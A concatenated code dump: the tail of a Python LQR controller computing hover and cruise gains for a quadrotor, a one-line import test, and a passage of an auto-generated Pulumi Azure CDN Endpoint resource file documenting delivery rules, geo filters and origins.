[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 10]]
R = [[100, 0, 0, 0],\
[ 0, 100, 0, 0],\
[ 0, 0, 100, 0],\
[ 0, 0, 0, 100]]
#Calculating Matrix K gain with LQR method:
k, S, E = lqr(A, B, Q, R)
k = np.array(Correction2D(k))
#Return these variables back to the control file.
return k
# -------------------------------------------------------------------------------------------------
def cruise(g, m, Ix, Iy, Iz, Cd, u_max):
K_cruise = np.zeros((10, 4, 9))
for i in range(10):
u = u_max*(i+1)/10
theta = np.arcsin(-Cd*(u**2)/(m*g))
w = u*np.tan(theta)
#Define State and Input Matrices:
A = [[ 0, 0, 0, 1, 0, np.tan(theta), 0, 0, 0],\
[ 0, 0, 0, 0, 1, 0, 0, 0, 0],\
[ 0, 0, 0, 0, 0, 1/np.cos(theta), 0, 0, 0],\
[ 0, 0, 0, 0, 0, 0, 0, 0, 0],\
[ 0, 0, 0, 0, 0, 0, 0, 0, 0],\
[ 0, 0, 0, 0, 0, 0, 0, 0, 0],\
[ 0, -g*np.cos(theta), 0, 0, -w, 0, -2*Cd*u/m, 0, 0],\
[g*np.cos(theta), 0, 0, w, 0, -u, 0, 0, 0],\
[ 0, -g*np.sin(theta), 0, 0, u, 0, 0, 0, 2*Cd*w/m]]
B = [[0 , 0 , 0 , 0 ],\
[0 , 0 , 0 , 0 ],\
[0 , 0 , 0 , 0 ],\
[0 , 1/Ix, 0 , 0 ],\
[0 , 0 , 1/Iy, 0 ],\
[0 , 0 , 0 , 1/Iz],\
[0 , 0 , 0 , 0 ],\
[0 , 0 , 0 , 0 ],\
[-1/m, 0 , 0 , 0 ]]
#Defining weight matrices Q and R for state and input matrices respectively:
Q = [[5, 0, 0, 0, 0, 0, 0, 0, 0],\
[0, 5, 0, 0, 0, 0, 0, 0, 0],\
[0, 0, 5, 0, 0, 0, 0, 0, 0],\
[0, 0, 0, 1, 0, 0, 0, 0, 0],\
[0, 0, 0, 0, 1, 0, 0, 0, 0],\
[0, 0, 0, 0, 0, 1, 0, 0, 0],\
[0, 0, 0, 0, 0, 0, 10, 0, 0],\
[0, 0, 0, 0, 0, 0, 0, 1, 0],\
[0, 0, 0, 0, 0, 0, 0, 0, 5]]
R = [[1, 0, 0, 0],\
[ 0, 1, 0, 0],\
[ 0, 0, 1, 0],\
[ 0, 0, 0, 1]]
#Calculating Matrix K gain with LQR method:
K, S, E = lqr(A, B, Q, R)
K_cruise[i] = np.array(Correction2D(K))
K_cruise = K_cruise.tolist()
#Return these variables back to the control file.
return K_cruise
# -------------------------------------------------------------------------------------------------
def spin():
return None
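A minimal usage sketch of the hover gain; the numeric parameters are illustrative and `controller` is a hypothetical import name for this module:

    import numpy as np
    import controller                      # hypothetical import of this module

    K = controller.hover(9.81, 1.0, 0.01, 0.01, 0.02)   # g, m, Ix, Iy, Iz
    x = np.zeros(12)                       # 12-dimensional state error vector
    u = -np.asarray(K) @ x                 # LQR state feedback, 4 inputs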
--------------------------------------------------------------------------------
tests/test_mass_project/test_mass_project.py · SBRG/MASS-project @ 9e247658700421622df3ba55014709b2c0833435 · MIT · Python · 56 bytes
--------------------------------------------------------------------------------
def test_mass_project_import():
import mass_project
--------------------------------------------------------------------------------
sdk/python/pulumi_azure/cdn/endpoint.py · davidobrien1985/pulumi-azure @ 811beeea473bd798d77354521266a87a2fac5888 · ECL-2.0/Apache-2.0 · Python · 57,603 bytes
--------------------------------------------------------------------------------
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import json
import warnings
import pulumi
import pulumi.runtime
from typing import Union
from .. import utilities, tables
class Endpoint(pulumi.CustomResource):
content_types_to_compresses: pulumi.Output[list]
"""
An array of strings that indicates the content types on which compression will be applied. The value for the elements should be MIME types.
"""
delivery_rules: pulumi.Output[list]
"""
Rules for the rules engine. An endpoint can contain up to four such rules, each consisting of conditions and actions. A `delivery_rule` block as defined below.
* `cacheExpirationAction` (`dict`) - A `cache_expiration_action` block as defined above.
* `behavior` (`str`) - The behavior of the cache. Valid values are `BypassCache`, `Override` and `SetIfMissing`.
* `duration` (`str`) - Duration of the cache. Only allowed when `behavior` is set to `Override` or `SetIfMissing`. Format: `[d.]hh:mm:ss`
* `cacheKeyQueryStringAction` (`dict`) - A `cache_key_query_string_action` block as defined above.
* `behavior` (`str`) - The behavior of the cache key for query strings. Valid values are `Exclude`, `ExcludeAll`, `Include` and `IncludeAll`.
* `parameters` (`str`) - Comma separated list of parameter values.
* `cookiesConditions` (`list`) - A `cookies_condition` block as defined above.
* `matchValues` (`list`) - List of values for the cookie.
* `negateCondition` (`bool`) - Defaults to `false`.
* `operator` (`str`) - Valid values are `Any`, `BeginsWith`, `Contains`, `EndsWith`, `Equal`, `GreaterThan`, `GreaterThanOrEqual`, `LessThan` and `LessThanOrEqual`.
* `selector` (`str`) - Name of the cookie.
* `transforms` (`list`) - Valid values are `Lowercase` and `Uppercase`.
* `deviceCondition` (`dict`) - A `device_condition` block as defined below.
* `matchValues` (`list`) - Valid values are `Desktop` and `Mobile`.
* `negateCondition` (`bool`) - Defaults to `false`.
* `operator` (`str`) - Valid values are `Equal`.
* `httpVersionConditions` (`list`) - A `http_version_condition` block as defined below.
* `matchValues` (`list`) - Valid values are `0.9`, `1.0`, `1.1` and `2.0`.
* `negateCondition` (`bool`) - Defaults to `false`.
* `operator` (`str`) - Valid values are `Equal`.
* `modifyRequestHeaderActions` (`list`) - A `modify_request_header_action` block as defined below.
* `action` (`str`) - Action to be executed on a header value. Valid values are `Append`, `Delete` and `Overwrite`.
* `name` (`str`) - The header name.
* `value` (`str`) - The value of the header. Only needed when `action` is set to `Append` or `overwrite`.
* `modifyResponseHeaderActions` (`list`) - A `modify_response_header_action` block as defined below.
* `action` (`str`) - Action to be executed on a header value. Valid values are `Append`, `Delete` and `Overwrite`.
* `name` (`str`) - The header name.
* `value` (`str`) - The value of the header. Only needed when `action` is set to `Append` or `overwrite`.
* `name` (`str`) - The Name which should be used for this Delivery Rule.
* `order` (`float`) - The order used for this rule, which must be larger than 1.
* `postArgConditions` (`list`) - A `post_arg_condition` block as defined below.
* `matchValues` (`list`) - List of string values.
* `negateCondition` (`bool`) - Defaults to `false`.
* `operator` (`str`) - Valid values are `Any`, `BeginsWith`, `Contains`, `EndsWith`, `Equal`, `GreaterThan`, `GreaterThanOrEqual`, `LessThan` and `LessThanOrEqual`.
* `selector` (`str`) - Name of the post arg.
* `transforms` (`list`) - Valid values are `Lowercase` and `Uppercase`.
* `queryStringConditions` (`list`) - A `query_string_condition` block as defined below.
* `matchValues` (`list`) - List of string values.
* `negateCondition` (`bool`) - Defaults to `false`.
* `operator` (`str`) - Valid values are `Any`, `BeginsWith`, `Contains`, `EndsWith`, `Equal`, `GreaterThan`, `GreaterThanOrEqual`, `LessThan` and `LessThanOrEqual`.
* `transforms` (`list`) - Valid values are `Lowercase` and `Uppercase`.
* `remoteAddressConditions` (`list`) - A `remote_address_condition` block as defined below.
* `matchValues` (`list`) - List of string values. For `GeoMatch` `operator` this should be a list of country codes (e.g. `US` or `DE`). List of IP address if `operator` equals to `IPMatch`.
* `negateCondition` (`bool`) - Defaults to `false`.
* `operator` (`str`) - Valid values are `Any`, `GeoMatch` and `IPMatch`.
* `requestBodyConditions` (`list`) - A `request_body_condition` block as defined below.
* `matchValues` (`list`) - List of string values.
* `negateCondition` (`bool`) - Defaults to `false`.
* `operator` (`str`) - Valid values are `Any`, `BeginsWith`, `Contains`, `EndsWith`, `Equal`, `GreaterThan`, `GreaterThanOrEqual`, `LessThan` and `LessThanOrEqual`.
* `transforms` (`list`) - Valid values are `Lowercase` and `Uppercase`.
* `requestHeaderConditions` (`list`) - A `request_header_condition` block as defined below.
* `matchValues` (`list`) - List of header values.
* `negateCondition` (`bool`) - Defaults to `false`.
* `operator` (`str`) - Valid values are `Any`, `BeginsWith`, `Contains`, `EndsWith`, `Equal`, `GreaterThan`, `GreaterThanOrEqual`, `LessThan` and `LessThanOrEqual`.
* `selector` (`str`) - Header name.
* `transforms` (`list`) - Valid values are `Lowercase` and `Uppercase`.
* `requestMethodCondition` (`dict`) - A `request_method_condition` block as defined below.
* `matchValues` (`list`) - Valid values are `DELETE`, `GET`, `HEAD`, `OPTIONS`, `POST` and `PUT`.
* `negateCondition` (`bool`) - Defaults to `false`.
* `operator` (`str`) - Valid values are `Equal`.
* `requestSchemeCondition` (`dict`) - A `request_scheme_condition` block as defined below.
* `matchValues` (`list`) - Valid values are `HTTP` and `HTTPS`.
* `negateCondition` (`bool`) - Defaults to `false`.
* `operator` (`str`) - Valid values are `Equal`.
* `requestUriConditions` (`list`) - A `request_uri_condition` block as defined below.
* `matchValues` (`list`) - List of string values.
* `negateCondition` (`bool`) - Defaults to `false`.
* `operator` (`str`) - Valid values are `Any`, `BeginsWith`, `Contains`, `EndsWith`, `Equal`, `GreaterThan`, `GreaterThanOrEqual`, `LessThan` and `LessThanOrEqual`.
* `transforms` (`list`) - Valid values are `Lowercase` and `Uppercase`.
* `urlFileExtensionConditions` (`list`) - A `url_file_extension_condition` block as defined below.
* `matchValues` (`list`) - List of string values.
* `negateCondition` (`bool`) - Defaults to `false`.
* `operator` (`str`) - Valid values are `Any`, `BeginsWith`, `Contains`, `EndsWith`, `Equal`, `GreaterThan`, `GreaterThanOrEqual`, `LessThan` and `LessThanOrEqual`.
* `transforms` (`list`) - Valid values are `Lowercase` and `Uppercase`.
* `urlFileNameConditions` (`list`) - A `url_file_name_condition` block as defined below.
* `matchValues` (`list`) - List of string values.
* `negateCondition` (`bool`) - Defaults to `false`.
* `operator` (`str`) - Valid values are `Any`, `BeginsWith`, `Contains`, `EndsWith`, `Equal`, `GreaterThan`, `GreaterThanOrEqual`, `LessThan` and `LessThanOrEqual`.
* `transforms` (`list`) - Valid values are `Lowercase` and `Uppercase`.
* `urlPathConditions` (`list`) - A `url_path_condition` block as defined below.
* `matchValues` (`list`) - List of string values.
* `negateCondition` (`bool`) - Defaults to `false`.
* `operator` (`str`) - Valid values are `Any`, `BeginsWith`, `Contains`, `EndsWith`, `Equal`, `GreaterThan`, `GreaterThanOrEqual`, `LessThan` and `LessThanOrEqual`.
* `transforms` (`list`) - Valid values are `Lowercase` and `Uppercase`.
* `urlRedirectAction` (`dict`) - A `url_redirect_action` block as defined below.
* `fragment` (`str`) - Specifies the fragment part of the URL. This value must not start with a `#`.
* `hostname` (`str`) - Specifies the hostname part of the URL.
* `path` (`str`) - Specifies the path part of the URL. This value must begin with a `/`.
* `protocol` (`str`) - Specifies the protocol part of the URL. Valid values are `Http` and `Https`.
* `queryString` (`str`) - Specifies the query string part of the URL. This value must not start with a `?` or `&` and must be in `<key>=<value>` format separated by `&`.
* `redirectType` (`str`) - Type of the redirect. Valid values are `Found`, `Moved`, `PermanentRedirect` and `TemporaryRedirect`.
* `urlRewriteAction` (`dict`) - A `url_rewrite_action` block as defined below.
* `destination` (`str`) - This value must start with a `/` and can't be longer than 260 characters.
* `preserveUnmatchedPath` (`bool`) - Defaults to `true`.
* `sourcePattern` (`str`) - This value must start with a `/` and can't be longer than 260 characters.
"""
geo_filters: pulumi.Output[list]
"""
A set of Geo Filters for this CDN Endpoint. Each `geo_filter` block supports fields documented below.
* `action` (`str`) - The Action of the Geo Filter. Possible values include `Allow` and `Block`.
* `countryCodes` (`list`) - A List of two letter country codes (e.g. `US`, `GB`) to be associated with this Geo Filter.
* `relative_path` (`str`) - The relative path applicable to geo filter.
"""
global_delivery_rule: pulumi.Output[dict]
"""
Actions that are valid for all resources regardless of any conditions. A `global_delivery_rule` block as defined below.
* `cacheExpirationAction` (`dict`) - A `cache_expiration_action` block as defined above.
* `behavior` (`str`) - The behavior of the cache. Valid values are `BypassCache`, `Override` and `SetIfMissing`.
* `duration` (`str`) - Duration of the cache. Only allowed when `behavior` is set to `Override` or `SetIfMissing`. Format: `[d.]hh:mm:ss`
* `cacheKeyQueryStringAction` (`dict`) - A `cache_key_query_string_action` block as defined above.
* `behavior` (`str`) - The behavior of the cache key for query strings. Valid values are `Exclude`, `ExcludeAll`, `Include` and `IncludeAll`.
* `parameters` (`str`) - Comma separated list of parameter values.
* `modifyRequestHeaderActions` (`list`) - A `modify_request_header_action` block as defined below.
* `action` (`str`) - Action to be executed on a header value. Valid values are `Append`, `Delete` and `Overwrite`.
* `name` (`str`) - The header name.
* `value` (`str`) - The value of the header. Only needed when `action` is set to `Append` or `overwrite`.
* `modifyResponseHeaderActions` (`list`) - A `modify_response_header_action` block as defined below.
* `action` (`str`) - Action to be executed on a header value. Valid values are `Append`, `Delete` and `Overwrite`.
* `name` (`str`) - The header name.
* `value` (`str`) - The value of the header. Only needed when `action` is set to `Append` or `overwrite`.
* `urlRedirectAction` (`dict`) - A `url_redirect_action` block as defined below.
* `fragment` (`str`) - Specifies the fragment part of the URL. This value must not start with a `#`.
* `hostname` (`str`) - Specifies the hostname part of the URL.
* `path` (`str`) - Specifies the path part of the URL. This value must begin with a `/`.
* `protocol` (`str`) - Specifies the protocol part of the URL. Valid values are `Http` and `Https`.
* `queryString` (`str`) - Specifies the query string part of the URL. This value must not start with a `?` or `&` and must be in `<key>=<value>` format separated by `&`.
* `redirectType` (`str`) - Type of the redirect. Valid values are `Found`, `Moved`, `PermanentRedirect` and `TemporaryRedirect`.
* `urlRewriteAction` (`dict`) - A `url_rewrite_action` block as defined below.
* `destination` (`str`) - This value must start with a `/` and can't be longer than 260 characters.
* `preserveUnmatchedPath` (`bool`) - Defaults to `true`.
* `sourcePattern` (`str`) - This value must start with a `/` and can't be longer than 260 characters.
"""
host_name: pulumi.Output[str]
"""
A string that determines the hostname/IP address of the origin server. This string can be a domain name, Storage Account endpoint, Web App endpoint, IPv4 address or IPv6 address. Changing this forces a new resource to be created.
"""
is_compression_enabled: pulumi.Output[bool]
"""
Indicates whether compression is to be enabled. Defaults to false.
"""
is_http_allowed: pulumi.Output[bool]
"""
Defaults to `true`.
"""
is_https_allowed: pulumi.Output[bool]
"""
Defaults to `true`.
"""
location: pulumi.Output[str]
"""
Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
"""
name: pulumi.Output[str]
"""
The name of the origin. This is an arbitrary value. However, this value needs to be unique under the endpoint. Changing this forces a new resource to be created.
"""
optimization_type: pulumi.Output[str]
"""
What types of optimization should this CDN Endpoint optimize for? Possible values include `DynamicSiteAcceleration`, `GeneralMediaStreaming`, `GeneralWebDelivery`, `LargeFileDownload` and `VideoOnDemandMediaStreaming`.
"""
origin_host_header: pulumi.Output[str]
"""
The host header CDN provider will send along with content requests to origins. Defaults to the host name of the origin.
"""
origin_path: pulumi.Output[str]
"""
The path used for origin requests.
"""
origins: pulumi.Output[list]
"""
The set of origins of the CDN endpoint. When multiple origins exist, the first origin will be used as primary and rest will be used as failover options. Each `origin` block supports fields documented below.
* `host_name` (`str`) - A string that determines the hostname/IP address of the origin server. This string can be a domain name, Storage Account endpoint, Web App endpoint, IPv4 address or IPv6 address. Changing this forces a new resource to be created.
* `httpPort` (`float`) - The HTTP port of the origin. Defaults to `80`. Changing this forces a new resource to be created.
* `httpsPort` (`float`) - The HTTPS port of the origin. Defaults to `443`. Changing this forces a new resource to be created.
* `name` (`str`) - The name of the origin. This is an arbitrary value. However, this value needs to be unique under the endpoint. Changing this forces a new resource to be created.
"""
probe_path: pulumi.Output[str]
"""
The path to a file hosted on the origin which helps accelerate delivery of the dynamic content and calculate the most optimal routes for the CDN. This is relative to the `origin_path`.
"""
profile_name: pulumi.Output[str]
"""
The CDN Profile to which to attach the CDN Endpoint.
"""
querystring_caching_behaviour: pulumi.Output[str]
"""
Sets query string caching behavior. Allowed values are `IgnoreQueryString`, `BypassCaching` and `UseQueryString`. Defaults to `IgnoreQueryString`.
"""
resource_group_name: pulumi.Output[str]
"""
The name of the resource group in which to create the CDN Endpoint.
"""
tags: pulumi.Output[dict]
"""
A mapping of tags to assign to the resource.
"""
def __init__(__self__, resource_name, opts=None, content_types_to_compresses=None, delivery_rules=None, geo_filters=None, global_delivery_rule=None, is_compression_enabled=None, is_http_allowed=None, is_https_allowed=None, location=None, name=None, optimization_type=None, origin_host_header=None, origin_path=None, origins=None, probe_path=None, profile_name=None, querystring_caching_behaviour=None, resource_group_name=None, tags=None, __props__=None, __name__=None, __opts__=None):
"""
A CDN Endpoint is the entity within a CDN Profile containing configuration information regarding caching behaviours and origins. The CDN Endpoint is exposed using the URL format <endpointname>.azureedge.net.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[list] content_types_to_compresses: An array of strings that indicates the content types on which compression will be applied. The value for the elements should be MIME types.
:param pulumi.Input[list] delivery_rules: Rules for the rules engine. An endpoint can contain up to four such rules, each consisting of conditions and actions. A `delivery_rule` block as defined below.
:param pulumi.Input[list] geo_filters: A set of Geo Filters for this CDN Endpoint. Each `geo_filter` block supports fields documented below.
:param pulumi.Input[dict] global_delivery_rule: Actions that are valid for all resources regardless of any conditions. A `global_delivery_rule` block as defined below.
:param pulumi.Input[bool] is_compression_enabled: Indicates whether compression is enabled. Defaults to `false`.
:param pulumi.Input[bool] is_http_allowed: Specifies whether HTTP traffic is allowed on the endpoint. Defaults to `true`.
:param pulumi.Input[bool] is_https_allowed: Specifies whether HTTPS traffic is allowed on the endpoint. Defaults to `true`.
:param pulumi.Input[str] location: Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
:param pulumi.Input[str] name: Specifies the name of the CDN Endpoint. Changing this forces a new resource to be created.
:param pulumi.Input[str] optimization_type: What types of optimization should this CDN Endpoint optimize for? Possible values include `DynamicSiteAcceleration`, `GeneralMediaStreaming`, `GeneralWebDelivery`, `LargeFileDownload` and `VideoOnDemandMediaStreaming`.
:param pulumi.Input[str] origin_host_header: The host header the CDN provider will send along with content requests to origins. Defaults to the host name of the origin.
:param pulumi.Input[str] origin_path: The path used for origin requests.
:param pulumi.Input[list] origins: The set of origins of the CDN endpoint. When multiple origins exist, the first origin is used as the primary and the rest are used as failover options. Each `origin` block supports fields documented below.
:param pulumi.Input[str] probe_path: The path to a file hosted on the origin which helps accelerate delivery of dynamic content and calculate the optimal routes for the CDN. This is relative to the `origin_path`.
:param pulumi.Input[str] profile_name: The CDN Profile to which to attach the CDN Endpoint.
:param pulumi.Input[str] querystring_caching_behaviour: Sets query string caching behavior. Allowed values are `IgnoreQueryString`, `BypassCaching` and `UseQueryString`. Defaults to `IgnoreQueryString`.
:param pulumi.Input[str] resource_group_name: The name of the resource group in which to create the CDN Endpoint.
:param pulumi.Input[dict] tags: A mapping of tags to assign to the resource.
The **delivery_rules** object supports the following:
* `cacheExpirationAction` (`pulumi.Input[dict]`) - A `cache_expiration_action` block as defined above.
* `behavior` (`pulumi.Input[str]`) - The behavior of the cache. Valid values are `BypassCache`, `Override` and `SetIfMissing`.
* `duration` (`pulumi.Input[str]`) - Duration of the cache. Only allowed when `behavior` is set to `Override` or `SetIfMissing`. Format: `[d.]hh:mm:ss`
* `cacheKeyQueryStringAction` (`pulumi.Input[dict]`) - A `cache_key_query_string_action` block as defined above.
* `behavior` (`pulumi.Input[str]`) - The behavior of the cache key for query strings. Valid values are `Exclude`, `ExcludeAll`, `Include` and `IncludeAll`.
* `parameters` (`pulumi.Input[str]`) - Comma separated list of parameter values.
* `cookiesConditions` (`pulumi.Input[list]`) - A `cookies_condition` block as defined above.
* `matchValues` (`pulumi.Input[list]`) - List of values for the cookie.
* `negateCondition` (`pulumi.Input[bool]`) - Defaults to `false`.
* `operator` (`pulumi.Input[str]`) - Valid values are `Any`, `BeginsWith`, `Contains`, `EndsWith`, `Equal`, `GreaterThan`, `GreaterThanOrEqual`, `LessThan` and `LessThanOrEqual`.
* `selector` (`pulumi.Input[str]`) - Name of the cookie.
* `transforms` (`pulumi.Input[list]`) - Valid values are `Lowercase` and `Uppercase`.
* `deviceCondition` (`pulumi.Input[dict]`) - A `device_condition` block as defined below.
* `matchValues` (`pulumi.Input[list]`) - Valid values are `Desktop` and `Mobile`.
* `negateCondition` (`pulumi.Input[bool]`) - Defaults to `false`.
* `operator` (`pulumi.Input[str]`) - The only valid value is `Equal`.
* `httpVersionConditions` (`pulumi.Input[list]`) - A `http_version_condition` block as defined below.
* `matchValues` (`pulumi.Input[list]`) - Valid values are `0.9`, `1.0`, `1.1` and `2.0`.
* `negateCondition` (`pulumi.Input[bool]`) - Defaults to `false`.
* `operator` (`pulumi.Input[str]`) - The only valid value is `Equal`.
* `modifyRequestHeaderActions` (`pulumi.Input[list]`) - A `modify_request_header_action` block as defined below.
* `action` (`pulumi.Input[str]`) - Action to be executed on a header value. Valid values are `Append`, `Delete` and `Overwrite`.
* `name` (`pulumi.Input[str]`) - The header name.
* `value` (`pulumi.Input[str]`) - The value of the header. Only needed when `action` is set to `Append` or `Overwrite`.
* `modifyResponseHeaderActions` (`pulumi.Input[list]`) - A `modify_response_header_action` block as defined below.
* `action` (`pulumi.Input[str]`) - Action to be executed on a header value. Valid values are `Append`, `Delete` and `Overwrite`.
* `name` (`pulumi.Input[str]`) - The header name.
* `value` (`pulumi.Input[str]`) - The value of the header. Only needed when `action` is set to `Append` or `Overwrite`.
* `name` (`pulumi.Input[str]`) - The Name which should be used for this Delivery Rule.
* `order` (`pulumi.Input[float]`) - The order used for this rule, which must be larger than 1.
* `postArgConditions` (`pulumi.Input[list]`) - A `post_arg_condition` block as defined below.
* `matchValues` (`pulumi.Input[list]`) - List of string values.
* `negateCondition` (`pulumi.Input[bool]`) - Defaults to `false`.
* `operator` (`pulumi.Input[str]`) - Valid values are `Any`, `BeginsWith`, `Contains`, `EndsWith`, `Equal`, `GreaterThan`, `GreaterThanOrEqual`, `LessThan` and `LessThanOrEqual`.
* `selector` (`pulumi.Input[str]`) - Name of the post arg.
* `transforms` (`pulumi.Input[list]`) - Valid values are `Lowercase` and `Uppercase`.
* `queryStringConditions` (`pulumi.Input[list]`) - A `query_string_condition` block as defined below.
* `matchValues` (`pulumi.Input[list]`) - List of string values.
* `negateCondition` (`pulumi.Input[bool]`) - Defaults to `false`.
* `operator` (`pulumi.Input[str]`) - Valid values are `Any`, `BeginsWith`, `Contains`, `EndsWith`, `Equal`, `GreaterThan`, `GreaterThanOrEqual`, `LessThan` and `LessThanOrEqual`.
* `transforms` (`pulumi.Input[list]`) - Valid values are `Lowercase` and `Uppercase`.
* `remoteAddressConditions` (`pulumi.Input[list]`) - A `remote_address_condition` block as defined below.
* `matchValues` (`pulumi.Input[list]`) - List of string values. For the `GeoMatch` `operator` this should be a list of country codes (e.g. `US` or `DE`); for the `IPMatch` `operator`, a list of IP addresses.
* `negateCondition` (`pulumi.Input[bool]`) - Defaults to `false`.
* `operator` (`pulumi.Input[str]`) - Valid values are `Any`, `GeoMatch` and `IPMatch`.
* `requestBodyConditions` (`pulumi.Input[list]`) - A `request_body_condition` block as defined below.
* `matchValues` (`pulumi.Input[list]`) - List of string values.
* `negateCondition` (`pulumi.Input[bool]`) - Defaults to `false`.
* `operator` (`pulumi.Input[str]`) - Valid values are `Any`, `BeginsWith`, `Contains`, `EndsWith`, `Equal`, `GreaterThan`, `GreaterThanOrEqual`, `LessThan` and `LessThanOrEqual`.
* `transforms` (`pulumi.Input[list]`) - Valid values are `Lowercase` and `Uppercase`.
* `requestHeaderConditions` (`pulumi.Input[list]`) - A `request_header_condition` block as defined below.
* `matchValues` (`pulumi.Input[list]`) - List of header values.
* `negateCondition` (`pulumi.Input[bool]`) - Defaults to `false`.
* `operator` (`pulumi.Input[str]`) - Valid values are `Any`, `BeginsWith`, `Contains`, `EndsWith`, `Equal`, `GreaterThan`, `GreaterThanOrEqual`, `LessThan` and `LessThanOrEqual`.
* `selector` (`pulumi.Input[str]`) - Header name.
* `transforms` (`pulumi.Input[list]`) - Valid values are `Lowercase` and `Uppercase`.
* `requestMethodCondition` (`pulumi.Input[dict]`) - A `request_method_condition` block as defined below.
* `matchValues` (`pulumi.Input[list]`) - Valid values are `DELETE`, `GET`, `HEAD`, `OPTIONS`, `POST` and `PUT`.
* `negateCondition` (`pulumi.Input[bool]`) - Defaults to `false`.
* `operator` (`pulumi.Input[str]`) - The only valid value is `Equal`.
* `requestSchemeCondition` (`pulumi.Input[dict]`) - A `request_scheme_condition` block as defined below.
* `matchValues` (`pulumi.Input[list]`) - Valid values are `HTTP` and `HTTPS`.
* `negateCondition` (`pulumi.Input[bool]`) - Defaults to `false`.
* `operator` (`pulumi.Input[str]`) - The only valid value is `Equal`.
* `requestUriConditions` (`pulumi.Input[list]`) - A `request_uri_condition` block as defined below.
* `matchValues` (`pulumi.Input[list]`) - List of string values.
* `negateCondition` (`pulumi.Input[bool]`) - Defaults to `false`.
* `operator` (`pulumi.Input[str]`) - Valid values are `Any`, `BeginsWith`, `Contains`, `EndsWith`, `Equal`, `GreaterThan`, `GreaterThanOrEqual`, `LessThan` and `LessThanOrEqual`.
* `transforms` (`pulumi.Input[list]`) - Valid values are `Lowercase` and `Uppercase`.
* `urlFileExtensionConditions` (`pulumi.Input[list]`) - A `url_file_extension_condition` block as defined below.
* `matchValues` (`pulumi.Input[list]`) - List of string values.
* `negateCondition` (`pulumi.Input[bool]`) - Defaults to `false`.
* `operator` (`pulumi.Input[str]`) - Valid values are `Any`, `BeginsWith`, `Contains`, `EndsWith`, `Equal`, `GreaterThan`, `GreaterThanOrEqual`, `LessThan` and `LessThanOrEqual`.
* `transforms` (`pulumi.Input[list]`) - Valid values are `Lowercase` and `Uppercase`.
* `urlFileNameConditions` (`pulumi.Input[list]`) - A `url_file_name_condition` block as defined below.
* `matchValues` (`pulumi.Input[list]`) - List of string values.
* `negateCondition` (`pulumi.Input[bool]`) - Defaults to `false`.
* `operator` (`pulumi.Input[str]`) - Valid values are `Any`, `BeginsWith`, `Contains`, `EndsWith`, `Equal`, `GreaterThan`, `GreaterThanOrEqual`, `LessThan` and `LessThanOrEqual`.
* `transforms` (`pulumi.Input[list]`) - Valid values are `Lowercase` and `Uppercase`.
* `urlPathConditions` (`pulumi.Input[list]`) - A `url_path_condition` block as defined below.
* `matchValues` (`pulumi.Input[list]`) - List of string values.
* `negateCondition` (`pulumi.Input[bool]`) - Defaults to `false`.
* `operator` (`pulumi.Input[str]`) - Valid values are `Any`, `BeginsWith`, `Contains`, `EndsWith`, `Equal`, `GreaterThan`, `GreaterThanOrEqual`, `LessThan` and `LessThanOrEqual`.
* `transforms` (`pulumi.Input[list]`) - Valid values are `Lowercase` and `Uppercase`.
* `urlRedirectAction` (`pulumi.Input[dict]`) - A `url_redirect_action` block as defined below.
* `fragment` (`pulumi.Input[str]`) - Specifies the fragment part of the URL. This value must not start with a `#`.
* `hostname` (`pulumi.Input[str]`) - Specifies the hostname part of the URL.
* `path` (`pulumi.Input[str]`) - Specifies the path part of the URL. This value must begin with a `/`.
* `protocol` (`pulumi.Input[str]`) - Specifies the protocol part of the URL. Valid values are `Http` and `Https`.
* `queryString` (`pulumi.Input[str]`) - Specifies the query string part of the URL. This value must not start with a `?` or `&` and must be in `<key>=<value>` format separated by `&`.
* `redirectType` (`pulumi.Input[str]`) - Type of the redirect. Valid values are `Found`, `Moved`, `PermanentRedirect` and `TemporaryRedirect`.
* `urlRewriteAction` (`pulumi.Input[dict]`) - A `url_rewrite_action` block as defined below.
* `destination` (`pulumi.Input[str]`) - This value must start with a `/` and can't be longer than 260 characters.
* `preserveUnmatchedPath` (`pulumi.Input[bool]`) - Defaults to `true`.
* `sourcePattern` (`pulumi.Input[str]`) - This value must start with a `/` and can't be longer than 260 characters.
The **geo_filters** object supports the following:
* `action` (`pulumi.Input[str]`) - The Action of the Geo Filter. Possible values include `Allow` and `Block`.
* `countryCodes` (`pulumi.Input[list]`) - A list of two-letter country codes (e.g. `US`, `GB`) to be associated with this Geo Filter.
* `relative_path` (`pulumi.Input[str]`) - The relative path applicable to the geo filter.
The **global_delivery_rule** object supports the following:
* `cacheExpirationAction` (`pulumi.Input[dict]`) - A `cache_expiration_action` block as defined above.
* `behavior` (`pulumi.Input[str]`) - The behavior of the cache. Valid values are `BypassCache`, `Override` and `SetIfMissing`.
* `duration` (`pulumi.Input[str]`) - Duration of the cache. Only allowed when `behavior` is set to `Override` or `SetIfMissing`. Format: `[d.]hh:mm:ss`
* `cacheKeyQueryStringAction` (`pulumi.Input[dict]`) - A `cache_key_query_string_action` block as defined above.
* `behavior` (`pulumi.Input[str]`) - The behavior of the cache key for query strings. Valid values are `Exclude`, `ExcludeAll`, `Include` and `IncludeAll`.
* `parameters` (`pulumi.Input[str]`) - Comma separated list of parameter values.
* `modifyRequestHeaderActions` (`pulumi.Input[list]`) - A `modify_request_header_action` block as defined below.
* `action` (`pulumi.Input[str]`) - Action to be executed on a header value. Valid values are `Append`, `Delete` and `Overwrite`.
* `name` (`pulumi.Input[str]`) - The header name.
* `value` (`pulumi.Input[str]`) - The value of the header. Only needed when `action` is set to `Append` or `Overwrite`.
* `modifyResponseHeaderActions` (`pulumi.Input[list]`) - A `modify_response_header_action` block as defined below.
* `action` (`pulumi.Input[str]`) - Action to be executed on a header value. Valid values are `Append`, `Delete` and `Overwrite`.
* `name` (`pulumi.Input[str]`) - The header name.
* `value` (`pulumi.Input[str]`) - The value of the header. Only needed when `action` is set to `Append` or `Overwrite`.
* `urlRedirectAction` (`pulumi.Input[dict]`) - A `url_redirect_action` block as defined below.
* `fragment` (`pulumi.Input[str]`) - Specifies the fragment part of the URL. This value must not start with a `#`.
* `hostname` (`pulumi.Input[str]`) - Specifies the hostname part of the URL.
* `path` (`pulumi.Input[str]`) - Specifies the path part of the URL. This value must begin with a `/`.
